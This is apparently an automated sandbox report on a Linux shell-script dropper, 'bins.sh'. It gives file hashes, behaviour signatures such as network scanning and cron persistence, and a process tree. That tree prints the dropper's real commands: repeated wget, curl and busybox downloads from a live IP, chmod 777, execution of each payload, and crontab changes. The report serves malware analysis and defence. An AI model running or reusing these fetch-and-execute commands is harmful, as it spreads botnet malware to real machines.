Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    09-11-2024 07:14

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    acf9f575ad4baba7d6272ee313fb67e5

  • SHA1

    8eeb94b3ee523a0d71cd2d8c1d5931fcde651e1a

  • SHA256

    29b6fbf8520e38ee858951211cf8d6364128b9e1a351e9fcc96cf4dc06c45e87

  • SHA512

    13a836bc239e2e1ccc70a558add24a0e74bac3382834b06489b8a316519a5376874cde608c0546de15bcd6aebd9c903089a751b52d7d40ad4a0f2cd6549b6c3d

  • SSDEEP

    96:yTPLN/mDiM57xKWeDvfo4458rr4cNXpfCT/invORL57RE684cN3KWeDvfJu4458L:cPRWiM3KWevfnKWevfP

Malware Config

Signatures

  • Contacts a large (2122) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1502
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1503
        • /usr/bin/wget
          wget http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
          2⤵
          • Writes file to tmp directory
          PID:1504
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
          2⤵
          • Writes file to tmp directory
          PID:1508
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
          2⤵
          • Writes file to tmp directory
          PID:1509
        • /bin/chmod
          chmod 777 XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
          2⤵
          • File and Directory Permissions Modification
          PID:1510
        • /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
          ./XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
          2⤵
          • Executes dropped EXE
          PID:1511
        • /bin/rm
          rm XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa
          2⤵
            PID:1513
          • /usr/bin/wget
            wget http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
            2⤵
            • Writes file to tmp directory
            PID:1514
          • /usr/bin/curl
            curl -O http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
            2⤵
            • Writes file to tmp directory
            PID:1515
          • /bin/busybox
            /bin/busybox wget http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
            2⤵
            • Writes file to tmp directory
            PID:1516
          • /bin/chmod
            chmod 777 7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
            2⤵
            • File and Directory Permissions Modification
            PID:1517
          • /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
            ./7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
            2⤵
            • Executes dropped EXE
            PID:1518
          • /bin/rm
            rm 7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B
            2⤵
              PID:1520
            • /usr/bin/wget
              wget http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
              2⤵
              • Writes file to tmp directory
              PID:1521
            • /usr/bin/curl
              curl -O http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
              2⤵
              • Writes file to tmp directory
              PID:1522
            • /bin/busybox
              /bin/busybox wget http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
              2⤵
              • Writes file to tmp directory
              PID:1523
            • /bin/chmod
              chmod 777 okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
              2⤵
              • File and Directory Permissions Modification
              PID:1524
            • /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
              ./okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
              2⤵
              • Executes dropped EXE
              PID:1525
            • /bin/rm
              rm okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy
              2⤵
                PID:1527
              • /usr/bin/wget
                wget http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
                2⤵
                • Writes file to tmp directory
                PID:1528
              • /usr/bin/curl
                curl -O http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
                2⤵
                • Writes file to tmp directory
                PID:1529
              • /bin/busybox
                /bin/busybox wget http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
                2⤵
                • Writes file to tmp directory
                PID:1530
              • /bin/chmod
                chmod 777 yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
                2⤵
                • File and Directory Permissions Modification
                PID:1531
              • /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
                ./yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
                2⤵
                • Executes dropped EXE
                • Renames itself
                • Reads runtime system information
                PID:1532
                • /bin/sh
                  sh -c "crontab -l"
                  3⤵
                    PID:1534
                    • /usr/bin/crontab
                      crontab -l
                      4⤵
                        PID:1535
                    • /bin/sh
                      sh -c "crontab -"
                      3⤵
                        PID:1536
                        • /usr/bin/crontab
                          crontab -
                          4⤵
                          • Creates/modifies Cron job
                          PID:1537
                    • /bin/rm
                      rm yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C
                      2⤵
                        PID:1539
                      • /usr/bin/wget
                        wget http://216.126.231.240/bins/bE1wZrR3LkaqAP5wPtbqf6sNNmp0d9shLL
                        2⤵
                          PID:1542

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B

                        Filesize

                        107KB

                        MD5

                        eb9c3a0de91fcf16ba17cb24608df68c

                        SHA1

                        09d95a7d70d5e115d103be51edff7c498d272fac

                        SHA256

                        dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                        SHA512

                        9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                      • /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa

                        Filesize

                        141KB

                        MD5

                        3ca8decdb1e52c423c521bfff02ac200

                        SHA1

                        8621ecd6807109b8541912ad9e134f6fb49bfd48

                        SHA256

                        dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                        SHA512

                        b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                      • /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy

                        Filesize

                        117KB

                        MD5

                        849fa04ef88a8e8de32cb2e8538de5fe

                        SHA1

                        c768af29fe4b6695fff1541623e8bbd1c6f242f7

                        SHA256

                        8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

                        SHA512

                        2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

                      • /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C

                        Filesize

                        112KB

                        MD5

                        05d7857dcead18bbd86d2935f591873c

                        SHA1

                        34d18f41ef35f93d5364ce3e24d74730a4e91985

                        SHA256

                        2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

                        SHA512

                        d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

                      • /var/spool/cron/crontabs/tmp.K46dZ3

                        Filesize

                        210B

                        MD5

                        a132196ae4d569319532ad392329f212

                        SHA1

                        837da12055a7d99b6a2d08b59c2650503fdf4fba

                        SHA256

                        e4c2d190b56613e31b0b376525e89a6b956b1c84fd07f94ba206cca99cb2dfba

                        SHA512

                        3572470e974a9d748dbf639d2197799676c98a9e344de9ff401c063df4bcb8cec3da202fd8c86d0ef732a635a105467acc95ea39c4e1b9e588c6712cdb0f9baa